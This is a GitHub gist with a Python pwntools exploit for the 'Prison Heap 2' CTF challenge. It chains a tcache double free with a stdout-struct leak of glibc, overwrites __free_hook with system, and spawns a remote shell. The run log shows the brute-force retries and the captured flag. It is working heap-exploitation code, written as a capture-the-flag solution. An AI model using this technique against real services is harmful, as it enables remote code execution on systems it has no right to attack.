Skip to content

Instantly share code, notes, and snippets.

@KaoRz
Created April 10, 2020 01:54
Show Gist options
  • Save KaoRz/143da359af96bde350cdfa0cf23a4b6c to your computer and use it in GitHub Desktop.
Save KaoRz/143da359af96bde350cdfa0cf23a4b6c to your computer and use it in GitHub Desktop.
Prison Heap 2 - C0r0n4CON Fwhibbit CTF
#!/usr/bin/env python3
# coding: utf-8
from pwn import *
context.terminal = ['tmux', 'sp', '-h']
#context.log_level = 'DEBUG'
HOST = "104.248.128.57"
PORT = 13337
LOCAL = False
elf = ELF("./prison_heap_hard")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False)
def write_prison(size, data, corrupted = False):
io.recvuntil("3. Exit")
io.sendline("1")
io.recvuntil("heap")
io.sendline(str(size))
if not corrupted:
io.recvuntil("enter the prison\n")
io.sendline(data)
else:
io.recvuntil("enter the prison")
sleep(0.5)
io.sendline(data)
def free_prison(idx):
io.recvuntil("3. Exit")
io.sendline("2")
io.recvuntil("free")
io.sendline(str(idx))
while(True):
if LOCAL == True:
io = process(elf.path)
else:
io = remote(HOST, PORT)
write_prison(0x10, "") # 0
write_prison(0x100, "") # 1
write_prison(0x100, "/bin/sh\x00") # 2 (Barrier)
for _ in range(8):
free_prison(1)
free_prison(0)
free_prison(0)
write_prison(0x10, p8(0x80)) # 3 (Overwrite fd pointer)
write_prison(0x10, "") # 4
write_prison(0x10, p16(0x8760)) # 5 (Good luck)
write_prison(0x100, "") # 6
try:
write_prison(0x100, p64(0xfbad1800) + p64(0x0) * 3 + b"\x00")
pre_leak = io.recv(0x8)
if pre_leak != b"\x00" * 8:
log.failure("FAIL! Retrying...")
io.close()
continue
log.success("HIT! Stdout struct overwritten.")
leak = u64(io.recv(8))
log.success("Leaked GLIBC address: " + hex(leak))
break
except EOFError as error:
log.failure("FAIL! Retrying...")
io.close()
continue
libc.address = leak - 0x3ed8b0
log.info("GLIBC base address: " + hex(libc.address))
log.info("System@@GLIBC address: " + hex(libc.sym["system"]))
write_prison(0x30, "", True)
free_prison(8)
free_prison(8)
write_prison(0x30, p64(libc.sym["__free_hook"]), True)
write_prison(0x30, "", True)
write_prison(0x30, p64(libc.sym["system"]), True)
free_prison(2)
io.interactive()
io.close()
'''
[*] '/home/kaorz/Desktop/CTFs/coronafw/heap2/prison_heap_hard'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[+] HIT! Stdout struct overwritten.
[+] Leaked GLIBC address: 0x7f58d6c498b0
[*] GLIBC base address: 0x7f58d685c000
[*] System@@GLIBC address: 0x7f58d68ab440
[*] Switching to interactive mode
$ cat /home/prison/prison_heap_hard/flag.txt
flag{h34p_Pr1s0n_1s_n3C3ss4rY_To_h4ck_Th3_Pl4n3t}
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment